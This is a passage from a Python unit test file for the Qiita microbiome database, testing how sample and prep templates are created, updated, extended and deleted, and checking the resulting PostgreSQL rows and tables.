self.assertEqual(obs, exp)
# The relevant rows have been added to the study_sample_columns
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.study_sample_columns WHERE study_id=2")
# study_id, column_name, column_type
exp = [[2, "str_column", "varchar"]]
self.assertEqual(obs, exp)
# The new table exists
self.assertTrue(exists_table("sample_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.sample_2")
# sample_id, str_column
exp = [['2.12.Sample1', "Value for sample 1"],
['2.12.Sample2', "Value for sample 2"],
['2.12.Sample3', "Value for sample 3"]]
self.assertEqual(obs, exp)
def test_create_str_prefixes(self):
"""Creates a new SampleTemplate"""
st = SampleTemplate.create(self.metadata_str_prefix, self.new_study)
# The returned object has the correct id
self.assertEqual(st.id, 2)
# The relevant rows to required_sample_info have been added.
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.required_sample_info WHERE study_id=2")
# sample_id study_id physical_location has_physical_specimen
# has_extracted_data sample_type required_sample_info_status_id
# collection_timestamp host_subject_id description
exp = [["2.foo.Sample1", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 1", 42.42, 41.41],
["2.bar.Sample2", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 2", 4.2, 1.1],
["2.foo.Sample3", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 3", 4.8, 4.41]]
self.assertEqual(sorted(obs), sorted(exp))
# The relevant rows have been added to the study_sample_columns
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.study_sample_columns WHERE study_id=2")
# study_id, column_name, column_type
exp = [[2, "str_column", "varchar"]]
self.assertEqual(obs, exp)
# The new table exists
self.assertTrue(exists_table("sample_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.sample_2")
# sample_id, str_column
exp = [['2.foo.Sample1', "Value for sample 1"],
['2.bar.Sample2', "Value for sample 2"],
['2.foo.Sample3', "Value for sample 3"]]
self.assertEqual(sorted(obs), sorted(exp))
def test_create_already_prefixed_samples(self):
"""Creates a new SampleTemplate with the samples already prefixed"""
st = npt.assert_warns(QiitaDBWarning, SampleTemplate.create,
self.metadata_prefixed, self.new_study)
# The returned object has the correct id
self.assertEqual(st.id, 2)
# The relevant rows to required_sample_info have been added.
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.required_sample_info WHERE study_id=2")
# sample_id study_id physical_location has_physical_specimen
# has_extracted_data sample_type required_sample_info_status_id
# collection_timestamp host_subject_id description
exp = [["2.Sample1", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 1", 42.42, 41.41],
["2.Sample2", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 2", 4.2, 1.1],
["2.Sample3", 2, "location1", True, True, "type1", 1,
datetime(2014, 5, 29, 12, 24, 51), "NotIdentified",
"Test Sample 3", 4.8, 4.41]]
self.assertEqual(obs, exp)
# The relevant rows have been added to the study_sample_columns
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.study_sample_columns WHERE study_id=2")
# study_id, column_name, column_type
exp = [[2, "str_column", "varchar"]]
self.assertEqual(obs, exp)
# The new table exists
self.assertTrue(exists_table("sample_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.sample_2")
# sample_id, str_column
exp = [['2.Sample1', "Value for sample 1"],
['2.Sample2', "Value for sample 2"],
['2.Sample3', "Value for sample 3"]]
self.assertEqual(obs, exp)
def test_delete(self):
"""Deletes Sample template 1"""
SampleTemplate.create(self.metadata, self.new_study)
SampleTemplate.delete(2)
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.required_sample_info WHERE study_id=2")
exp = []
self.assertEqual(obs, exp)
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.study_sample_columns WHERE study_id=2")
exp = []
self.assertEqual(obs, exp)
with self.assertRaises(QiitaDBExecutionError):
self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.sample_2")
def test_delete_unkonwn_id_error(self):
"""Try to delete a non existent prep template"""
with self.assertRaises(QiitaDBUnknownIDError):
SampleTemplate.delete(5)
def test_exists_true(self):
"""Exists returns true when the SampleTemplate already exists"""
self.assertTrue(SampleTemplate.exists(self.test_study.id))
def test_exists_false(self):
"""Exists returns false when the SampleTemplate does not exists"""
self.assertFalse(SampleTemplate.exists(self.new_study.id))
def test_get_sample_ids(self):
"""get_sample_ids returns the correct set of sample ids"""
obs = self.tester._get_sample_ids(self.conn_handler)
self.assertEqual(obs, self.exp_sample_ids)
def test_len(self):
"""Len returns the correct number of sample ids"""
self.assertEqual(len(self.tester), 27)
def test_getitem(self):
"""Get item returns the correct sample object"""
obs = self.tester['1.SKM7.640188']
exp = Sample('1.SKM7.640188', self.tester)
self.assertEqual(obs, exp)
def test_getitem_error(self):
"""Get item raises an error if key does not exists"""
with self.assertRaises(KeyError):
self.tester['Not_a_Sample']
def test_update_category(self):
"""setitem raises an error (currently not allowed)"""
with self.assertRaises(QiitaDBUnknownIDError):
self.tester.update_category('country', {"foo": "bar"})
with self.assertRaises(QiitaDBColumnError):
self.tester.update_category('missing column',
{'1.SKM7.640188': 'stuff'})
negtest = self.tester['1.SKM7.640188']['country']
mapping = {'1.SKB1.640202': "1",
'1.SKB5.640181': "2",
'1.SKD6.640190': "3"}
self.tester.update_category('country', mapping)
self.assertEqual(self.tester['1.SKB1.640202']['country'], "1")
self.assertEqual(self.tester['1.SKB5.640181']['country'], "2")
self.assertEqual(self.tester['1.SKD6.640190']['country'], "3")
self.assertEqual(self.tester['1.SKM7.640188']['country'], negtest)
# test updating a required_sample_info
mapping = {'1.SKB1.640202': "1",
'1.SKB5.640181': "2",
'1.SKD6.640190': "3"}
self.tester.update_category('required_sample_info_status_id', mapping)
self.assertEqual(
self.tester['1.SKB1.640202']['required_sample_info_status'],
"received")
self.assertEqual(
self.tester['1.SKB5.640181']['required_sample_info_status'],
"in_preparation")
self.assertEqual(
self.tester['1.SKD6.640190']['required_sample_info_status'],
"running")
self.assertEqual(
self.tester['1.SKM7.640188']['required_sample_info_status'],
"completed")
# testing that if fails when trying to change an int column value
# to str
st = SampleTemplate.create(self.metadata, self.new_study)
mapping = {'2.Sample1': "no_value"}
with self.assertRaises(ValueError):
st.update_category('int_column', mapping)
def test_update(self):
"""Updates values in existing mapping file"""
# creating a new sample template
st = SampleTemplate.create(self.metadata, self.new_study)
# updating the sample template
st.update(self.metadata_dict_updated)
# validating values
exp = self.metadata_dict_updated_dict['Sample1'].values()
obs = st.get('2.Sample1').values()
self.assertItemsEqual(obs, exp)
exp = self.metadata_dict_updated_dict['Sample2'].values()
obs = st.get('2.Sample2').values()
self.assertItemsEqual(obs, exp)
exp = self.metadata_dict_updated_dict['Sample3'].values()
obs = st.get('2.Sample3').values()
self.assertItemsEqual(obs, exp)
# checking errors
with self.assertRaises(QiitaDBError):
st.update(self.metadata_dict_updated_sample_error)
with self.assertRaises(QiitaDBError):
st.update(self.metadata_dict_updated_column_error)
def test_add_category(self):
column = "new_column"
dtype = "varchar"
default = "stuff"
mapping = {'1.SKB1.640202': "1",
'1.SKB5.640181': "2",
'1.SKD6.640190': "3"}
exp = {
'1.SKB1.640202': "1",
'1.SKB2.640194': "stuff",
'1.SKB3.640195': "stuff",
'1.SKB4.640189': "stuff",
'1.SKB5.640181': "2",
'1.SKB6.640176': "stuff",
'1.SKB7.640196': "stuff",
'1.SKB8.640193': "stuff",
'1.SKB9.640200': "stuff",
'1.SKD1.640179': "stuff",
'1.SKD2.640178': "stuff",
'1.SKD3.640198': "stuff",
'1.SKD4.640185': "stuff",
'1.SKD5.640186': "stuff",
'1.SKD6.640190': "3",
'1.SKD7.640191': "stuff",
'1.SKD8.640184': "stuff",
'1.SKD9.640182': "stuff",
'1.SKM1.640183': "stuff",
'1.SKM2.640199': "stuff",
'1.SKM3.640197': "stuff",
'1.SKM4.640180': "stuff",
'1.SKM5.640177': "stuff",
'1.SKM6.640187': "stuff",
'1.SKM7.640188': "stuff",
'1.SKM8.640201': "stuff",
'1.SKM9.640192': "stuff"}
self.tester.add_category(column, mapping, dtype, default)
obs = {k: v['new_column'] for k, v in self.tester.items()}
self.assertEqual(obs, exp)
def test_categories(self):
exp = {'season_environment',
'assigned_from_geo', 'texture', 'taxon_id', 'depth',
'host_taxid', 'common_name', 'water_content_soil', 'elevation',
'temp', 'tot_nitro', 'samp_salinity', 'altitude', 'env_biome',
'country', 'ph', 'anonymized_name', 'tot_org_carb',
'description_duplicate', 'env_feature'}
obs = self.tester.categories()
self.assertEqual(obs, exp)
def test_remove_category(self):
with self.assertRaises(QiitaDBColumnError):
self.tester.remove_category('does not exist')
for v in self.tester.values():
self.assertIn('elevation', v)
self.tester.remove_category('elevation')
for v in self.tester.values():
self.assertNotIn('elevation', v)
def test_iter(self):
"""iter returns an iterator over the sample ids"""
obs = self.tester.__iter__()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_sample_ids)
def test_contains_true(self):
"""contains returns true if the sample id exists"""
self.assertTrue('1.SKM7.640188' in self.tester)
def test_contains_false(self):
"""contains returns false if the sample id does not exists"""
self.assertFalse('Not_a_Sample' in self.tester)
def test_keys(self):
"""keys returns an iterator over the sample ids"""
obs = self.tester.keys()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_sample_ids)
def test_values(self):
"""values returns an iterator over the values"""
obs = self.tester.values()
self.assertTrue(isinstance(obs, Iterable))
exp = {Sample('1.SKB1.640202', self.tester),
Sample('1.SKB2.640194', self.tester),
Sample('1.SKB3.640195', self.tester),
Sample('1.SKB4.640189', self.tester),
Sample('1.SKB5.640181', self.tester),
Sample('1.SKB6.640176', self.tester),
Sample('1.SKB7.640196', self.tester),
Sample('1.SKB8.640193', self.tester),
Sample('1.SKB9.640200', self.tester),
Sample('1.SKD1.640179', self.tester),
Sample('1.SKD2.640178', self.tester),
Sample('1.SKD3.640198', self.tester),
Sample('1.SKD4.640185', self.tester),
Sample('1.SKD5.640186', self.tester),
Sample('1.SKD6.640190', self.tester),
Sample('1.SKD7.640191', self.tester),
Sample('1.SKD8.640184', self.tester),
Sample('1.SKD9.640182', self.tester),
Sample('1.SKM1.640183', self.tester),
Sample('1.SKM2.640199', self.tester),
Sample('1.SKM3.640197', self.tester),
Sample('1.SKM4.640180', self.tester),
Sample('1.SKM5.640177', self.tester),
Sample('1.SKM6.640187', self.tester),
Sample('1.SKM7.640188', self.tester),
Sample('1.SKM8.640201', self.tester),
Sample('1.SKM9.640192', self.tester)}
# Creating a list and looping over it since unittest does not call
# the __eq__ function on the objects
for o, e in zip(sorted(list(obs), key=lambda x: x.id),
sorted(exp, key=lambda x: x.id)):
self.assertEqual(o, e)
def test_items(self):
"""items returns an iterator over the (key, value) tuples"""
obs = self.tester.items()
self.assertTrue(isinstance(obs, Iterable))
exp = [('1.SKB1.640202', Sample('1.SKB1.640202', self.tester)),
('1.SKB2.640194', Sample('1.SKB2.640194', self.tester)),
('1.SKB3.640195', Sample('1.SKB3.640195', self.tester)),
('1.SKB4.640189', Sample('1.SKB4.640189', self.tester)),
('1.SKB5.640181', Sample('1.SKB5.640181', self.tester)),
('1.SKB6.640176', Sample('1.SKB6.640176', self.tester)),
('1.SKB7.640196', Sample('1.SKB7.640196', self.tester)),
('1.SKB8.640193', Sample('1.SKB8.640193', self.tester)),
('1.SKB9.640200', Sample('1.SKB9.640200', self.tester)),
('1.SKD1.640179', Sample('1.SKD1.640179', self.tester)),
('1.SKD2.640178', Sample('1.SKD2.640178', self.tester)),
('1.SKD3.640198', Sample('1.SKD3.640198', self.tester)),
('1.SKD4.640185', Sample('1.SKD4.640185', self.tester)),
('1.SKD5.640186', Sample('1.SKD5.640186', self.tester)),
('1.SKD6.640190', Sample('1.SKD6.640190', self.tester)),
('1.SKD7.640191', Sample('1.SKD7.640191', self.tester)),
('1.SKD8.640184', Sample('1.SKD8.640184', self.tester)),
('1.SKD9.640182', Sample('1.SKD9.640182', self.tester)),
('1.SKM1.640183', Sample('1.SKM1.640183', self.tester)),
('1.SKM2.640199', Sample('1.SKM2.640199', self.tester)),
('1.SKM3.640197', Sample('1.SKM3.640197', self.tester)),
('1.SKM4.640180', Sample('1.SKM4.640180', self.tester)),
('1.SKM5.640177', Sample('1.SKM5.640177', self.tester)),
('1.SKM6.640187', Sample('1.SKM6.640187', self.tester)),
('1.SKM7.640188', Sample('1.SKM7.640188', self.tester)),
('1.SKM8.640201', Sample('1.SKM8.640201', self.tester)),
('1.SKM9.640192', Sample('1.SKM9.640192', self.tester))]
# Creating a list and looping over it since unittest does not call
# the __eq__ function on the objects
for o, e in zip(sorted(list(obs)), sorted(exp)):
self.assertEqual(o, e)
def test_get(self):
"""get returns the correct sample object"""
obs = self.tester.get('1.SKM7.640188')
exp = Sample('1.SKM7.640188', self.tester)
self.assertEqual(obs, exp)
def test_get_none(self):
"""get returns none if the sample id is not present"""
self.assertTrue(self.tester.get('Not_a_Sample') is None)
def test_to_file(self):
"""to file writes a tab delimited file with all the metadata"""
fd, fp = mkstemp()
close(fd)
st = SampleTemplate.create(self.metadata, self.new_study)
st.to_file(fp)
self._clean_up_files.append(fp)
with open(fp, 'U') as f:
obs = f.read()
self.assertEqual(obs, EXP_SAMPLE_TEMPLATE)
fd, fp = mkstemp()
close(fd)
st.to_file(fp, {'2.Sample1', '2.Sample3'})
self._clean_up_files.append(fp)
with open(fp, 'U') as f:
obs = f.read()
self.assertEqual(obs, EXP_SAMPLE_TEMPLATE_FEWER_SAMPLES)
def test_get_filepath(self):
# we will check that there is a new id only because the path will
# change based on time and the same functionality is being tested
# in data.py
exp_id = self.conn_handler.execute_fetchone(
"SELECT count(1) FROM qiita.filepath")[0] + 1
st = SampleTemplate.create(self.metadata, self.new_study)
self.assertEqual(st.get_filepaths()[0][0], exp_id)
# testing current functionaly, to add a new sample template
# you need to erase it first
SampleTemplate.delete(st.id)
exp_id += 1
st = SampleTemplate.create(self.metadata, self.new_study)
self.assertEqual(st.get_filepaths()[0][0], exp_id)
def test_extend(self):
# add new column and delete one that exists
self.metadata['NEWCOL'] = pd.Series(['val1', 'val2', 'val3'],
index=self.metadata.index)
self.tester.extend(self.metadata)
# test samples were appended successfully
sql = ("SELECT sample_id FROM qiita.required_sample_info WHERE "
"study_id = 1")
obs = self.conn_handler.execute_fetchall(sql)
exp = [['1.SKB8.640193'], ['1.SKD8.640184'], ['1.SKB7.640196'],
['1.SKM9.640192'], ['1.SKM4.640180'], ['1.SKM5.640177'],
['1.SKB5.640181'], ['1.SKD6.640190'], ['1.SKB2.640194'],
['1.SKD2.640178'], ['1.SKM7.640188'], ['1.SKB1.640202'],
['1.SKD1.640179'], ['1.SKD3.640198'], ['1.SKM8.640201'],
['1.SKM2.640199'], ['1.SKB9.640200'], ['1.SKD5.640186'],
['1.SKM3.640197'], ['1.SKD9.640182'], ['1.SKB4.640189'],
['1.SKD7.640191'], ['1.SKM6.640187'], ['1.SKD4.640185'],
['1.SKB3.640195'], ['1.SKB6.640176'], ['1.SKM1.640183'],
['1.Sample1'], ['1.Sample2'], ['1.Sample3']]
self.assertEqual(obs, exp)
sql = "SELECT sample_id FROM qiita.sample_1"
obs = self.conn_handler.execute_fetchall(sql)
exp = [['1.SKM7.640188'], ['1.SKD9.640182'], ['1.SKM8.640201'],
['1.SKB8.640193'], ['1.SKD2.640178'], ['1.SKM3.640197'],
['1.SKM4.640180'], ['1.SKB9.640200'], ['1.SKB4.640189'],
['1.SKB5.640181'], ['1.SKB6.640176'], ['1.SKM2.640199'],
['1.SKM5.640177'], ['1.SKB1.640202'], ['1.SKD8.640184'],
['1.SKD4.640185'], ['1.SKB3.640195'], ['1.SKM1.640183'],
['1.SKB7.640196'], ['1.SKD3.640198'], ['1.SKD7.640191'],
['1.SKD6.640190'], ['1.SKB2.640194'], ['1.SKM9.640192'],
['1.SKM6.640187'], ['1.SKD5.640186'], ['1.SKD1.640179'],
['1.Sample1'], ['1.Sample2'], ['1.Sample3']]
self.assertEqual(obs, exp)
# test new columns were added to *_cols table and dynamic table
obs = get_table_cols('sample_1', self.conn_handler)
exp = ['sample_id', 'season_environment', 'assigned_from_geo',
'texture', 'taxon_id', 'depth', 'host_taxid', 'common_name',
'water_content_soil', 'elevation', 'temp', 'tot_nitro',
'samp_salinity', 'altitude', 'env_biome', 'country', 'ph',
'anonymized_name', 'tot_org_carb', 'description_duplicate',
'env_feature', 'newcol', 'str_column', 'int_column']
self.assertItemsEqual(obs, exp)
sql = "SELECT * FROM qiita.study_sample_columns WHERE study_id = 1"
obs = self.conn_handler.execute_fetchall(sql)
exp = [[1, 'str_column', 'varchar'], [1, 'newcol', 'varchar'],
[1, 'ENV_FEATURE', 'varchar'],
[1, 'Description_duplicate', 'varchar'],
[1, 'TOT_ORG_CARB', 'float8'],
[1, 'ANONYMIZED_NAME', 'varchar'], [1, 'PH', 'float8'],
[1, 'COUNTRY', 'varchar'], [1, 'ENV_BIOME', 'varchar'],
[1, 'ALTITUDE', 'float8'], [1, 'SAMP_SALINITY', 'float8'],
[1, 'TOT_NITRO', 'float8'], [1, 'TEMP', 'float8'],
[1, 'ELEVATION', 'float8'],
[1, 'WATER_CONTENT_SOIL', 'float8'],
[1, 'COMMON_NAME', 'varchar'], [1, 'HOST_TAXID', 'varchar'],
[1, 'DEPTH', 'float8'], [1, 'TAXON_ID', 'varchar'],
[1, 'TEXTURE', 'varchar'],
[1, 'ASSIGNED_FROM_GEO', 'varchar'],
[1, 'SEASON_ENVIRONMENT', 'varchar'],
[1, 'sample_id', 'varchar'],
[1L, 'int_column', 'integer']]
self.assertItemsEqual(obs, exp)
def test_extend_duplicated_samples(self):
# First add new samples to template
self.tester.extend(self.metadata)
self.metadata_dict['Sample5'] = {
'physical_location': 'location5',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type5',
'required_sample_info_status': 'received',
'collection_timestamp': datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 5',
'str_column': 'Value for sample 5',
'int_column': 5,
'latitude': 45.45,
'longitude': 44.44}
new_metadata = pd.DataFrame.from_dict(self.metadata_dict,
orient='index')
# Make sure adding duplicate samples raises warning
npt.assert_warns(QiitaDBWarning, self.tester.extend, new_metadata)
# Make sure unknown sample still added to the study
sql = "SELECT sample_id FROM qiita.sample_1"
obs = self.conn_handler.execute_fetchall(sql)
exp = [['1.SKM7.640188'], ['1.SKD9.640182'], ['1.SKM8.640201'],
['1.SKB8.640193'], ['1.SKD2.640178'], ['1.SKM3.640197'],
['1.SKM4.640180'], ['1.SKB9.640200'], ['1.SKB4.640189'],
['1.SKB5.640181'], ['1.SKB6.640176'], ['1.SKM2.640199'],
['1.SKM5.640177'], ['1.SKB1.640202'], ['1.SKD8.640184'],
['1.SKD4.640185'], ['1.SKB3.640195'], ['1.SKM1.640183'],
['1.SKB7.640196'], ['1.SKD3.640198'], ['1.SKD7.640191'],
['1.SKD6.640190'], ['1.SKB2.640194'], ['1.SKM9.640192'],
['1.SKM6.640187'], ['1.SKD5.640186'], ['1.SKD1.640179'],
['1.Sample1'], ['1.Sample2'], ['1.Sample3'], ['1.Sample5']]
self.assertEqual(obs, exp)
@qiita_test_checker()
class TestPrepTemplate(TestCase):
"""Tests the PrepTemplate class"""
def setUp(self):
self.metadata_dict = {
'SKB8.640193': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 1',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'GTCCGCAAGTTA',
'run_prefix': "s_G1_L001_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'},
'SKD8.640184': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 2',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'CGTAGAGCTCTC',
'run_prefix': "s_G1_L001_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'},
'SKB7.640196': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 3',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'CCTCTGAGAGCT',
'run_prefix': "s_G1_L002_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'}
}
self.metadata = pd.DataFrame.from_dict(self.metadata_dict,
orient='index')
metadata_prefixed_dict = {
'1.SKB8.640193': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 1',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'GTCCGCAAGTTA',
'run_prefix': "s_G1_L001_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'},
'1.SKD8.640184': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 2',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'CGTAGAGCTCTC',
'run_prefix': "s_G1_L001_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'},
'1.SKB7.640196': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 3',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'CCTCTGAGAGCT',
'run_prefix': "s_G1_L002_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'}
}
self.metadata_prefixed = pd.DataFrame.from_dict(metadata_prefixed_dict,
orient='index')
self.test_raw_data = RawData(1)
self.test_study = Study(1)
self.data_type = "18S"
self.data_type_id = 2
fd, seqs_fp = mkstemp(suffix='_seqs.fastq')
close(fd)
fd, barcodes_fp = mkstemp(suffix='_barcodes.fastq')
close(fd)
filepaths = [(seqs_fp, 1), (barcodes_fp, 2)]
with open(seqs_fp, "w") as f:
f.write("\n")
with open(barcodes_fp, "w") as f:
f.write("\n")
self.new_raw_data = RawData.create(2, [Study(1)], filepaths=filepaths)
db_test_raw_dir = join(get_db_files_base_dir(), 'raw_data')
db_seqs_fp = join(db_test_raw_dir, "5_%s" % basename(seqs_fp))
db_barcodes_fp = join(db_test_raw_dir, "5_%s" % basename(barcodes_fp))
self._clean_up_files = [db_seqs_fp, db_barcodes_fp]
self.tester = PrepTemplate(1)
self.exp_sample_ids = {
'1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195', '1.SKB4.640189',
'1.SKB5.640181', '1.SKB6.640176', '1.SKB7.640196', '1.SKB8.640193',
'1.SKB9.640200', '1.SKD1.640179', '1.SKD2.640178', '1.SKD3.640198',
'1.SKD4.640185', '1.SKD5.640186', '1.SKD6.640190', '1.SKD7.640191',
'1.SKD8.640184', '1.SKD9.640182', '1.SKM1.640183', '1.SKM2.640199',
'1.SKM3.640197', '1.SKM4.640180', '1.SKM5.640177', '1.SKM6.640187',
'1.SKM7.640188', '1.SKM8.640201', '1.SKM9.640192'}
def tearDown(self):
for f in self._clean_up_files:
remove(f)
def test_study_id(self):
"""Ensure that the correct study ID is returned"""
self.assertEqual(self.tester.study_id, 1)
def test_init_unknown_error(self):
"""Init raises an error if the id is not known"""
with self.assertRaises(QiitaDBUnknownIDError):
PrepTemplate(2)
def test_init(self):
"""Init successfully instantiates the object"""
st = PrepTemplate(1)
self.assertTrue(st.id, 1)
def test_table_name(self):
"""Table name return the correct string"""
obs = PrepTemplate._table_name(1)
self.assertEqual(obs, "prep_1")
def test_create_duplicate_header(self):
"""Create raises an error when duplicate headers are present"""
self.metadata['STR_COLUMN'] = pd.Series(['', '', ''],
index=self.metadata.index)
with self.assertRaises(QiitaDBDuplicateHeaderError):
PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type)
def test_create_bad_sample_names(self):
# set a horrible list of sample names
self.metadata.index = ['o()xxxx[{::::::::>', 'sample.1', 'sample.3']
with self.assertRaises(QiitaDBColumnError):
PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type)
def test_create_unknown_sample_names(self):
# set two real and one fake sample name
self.metadata_dict['NOTREAL'] = self.metadata_dict['SKB7.640196']
del self.metadata_dict['SKB7.640196']
self.metadata = pd.DataFrame.from_dict(self.metadata_dict,
orient='index')
# Test error raised and correct error given
with self.assertRaises(QiitaDBExecutionError) as err:
PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type)
self.assertEqual(
str(err.exception), 'Samples found in prep template but not sample'
' template: 1.NOTREAL')
def test_create_shorter_prep_template(self):
# remove one sample so not all samples in the prep template
del self.metadata_dict['SKB7.640196']
self.metadata = pd.DataFrame.from_dict(self.metadata_dict,
orient='index')
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type)
# make sure the two samples were added correctly
self.assertEqual(pt.id, 2)
obs = self.conn_handler.execute_fetchall(
"SELECT sample_id FROM qiita.prep_2")
exp = [['1.SKB8.640193'], ['1.SKD8.640184']]
self.assertEqual(obs, exp)
def test_create_error_cleanup(self):
"""Create does not modify the database if an error happens"""
metadata_dict = {
'SKB8.640193': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'group': 2,
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'GTCCGCAAGTTA',
'run_prefix': "s_G1_L001_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'},
'SKD8.640184': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'group': 1,
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'CGTAGAGCTCTC',
'run_prefix': "s_G1_L001_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'},
'SKB7.640196': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'group': 'Value for sample 3',
'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',
'barcodesequence': 'CCTCTGAGAGCT',
'run_prefix': "s_G1_L002_sequences",
'platform': 'ILLUMINA',
'library_construction_protocol': 'AAAA',
'experiment_design_description': 'BBBB'}
}
metadata = pd.DataFrame.from_dict(metadata_dict, orient='index')
exp_id = get_count("qiita.prep_template") + 1
with self.assertRaises(QiitaDBExecutionError):
PrepTemplate.create(metadata, self.new_raw_data,
self.test_study, self.data_type)
sql = """SELECT EXISTS(
SELECT * FROM qiita.prep_template
WHERE prep_template_id=%s)"""
self.assertFalse(self.conn_handler.execute_fetchone(sql, (exp_id,))[0])
sql = """SELECT EXISTS(
SELECT * FROM qiita.common_prep_info
WHERE prep_template_id=%s)"""
self.assertFalse(self.conn_handler.execute_fetchone(sql, (exp_id,))[0])
sql = """SELECT EXISTS(
SELECT * FROM qiita.prep_columns
WHERE prep_template_id=%s)"""
self.assertFalse(self.conn_handler.execute_fetchone(sql, (exp_id,))[0])
self.assertFalse(exists_table("prep_%d" % exp_id, self.conn_handler))
def test_create(self):
"""Creates a new PrepTemplate"""
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type)
# The returned object has the correct id
self.assertEqual(pt.id, 2)
# The row in the prep template table has been created
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_template WHERE prep_template_id=2")
# prep_template_id, data_type_id, raw_data_id, preprocessing_status,
# investigation_type
self.assertEqual(obs, [[2, 2, 5, 'not_preprocessed', None]])
# The relevant rows to common_prep_info have been added.
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.common_prep_info WHERE prep_template_id=2")
# prep_template_id, sample_id, study_id, center_name,
# center_project_name, emp_status_id
exp = [[2, '1.SKB8.640193', 'ANL', 'Test Project', 1],
[2, '1.SKD8.640184', 'ANL', 'Test Project', 1],
[2, '1.SKB7.640196', 'ANL', 'Test Project', 1]]
self.assertEqual(sorted(obs), sorted(exp))
# The relevant rows have been added to the prep_columns table
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_columns WHERE prep_template_id=2")
# prep_template_id, column_name, column_type
exp = [[2, 'str_column', 'varchar'],
[2, 'ebi_submission_accession', 'varchar'],
[2, 'run_prefix', 'varchar'],
[2, 'barcodesequence', 'varchar'],
[2, 'linkerprimersequence', 'varchar'],
[2, 'platform', 'varchar'],
[2, 'experiment_design_description', 'varchar'],
[2, 'library_construction_protocol', 'varchar']]
self.assertEqual(sorted(obs), sorted(exp))
# The new table exists
self.assertTrue(exists_table("prep_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_2")
# sample_id, study_id, str_column, ebi_submission_accession,
# run_prefix, barcodesequence, linkerprimersequence
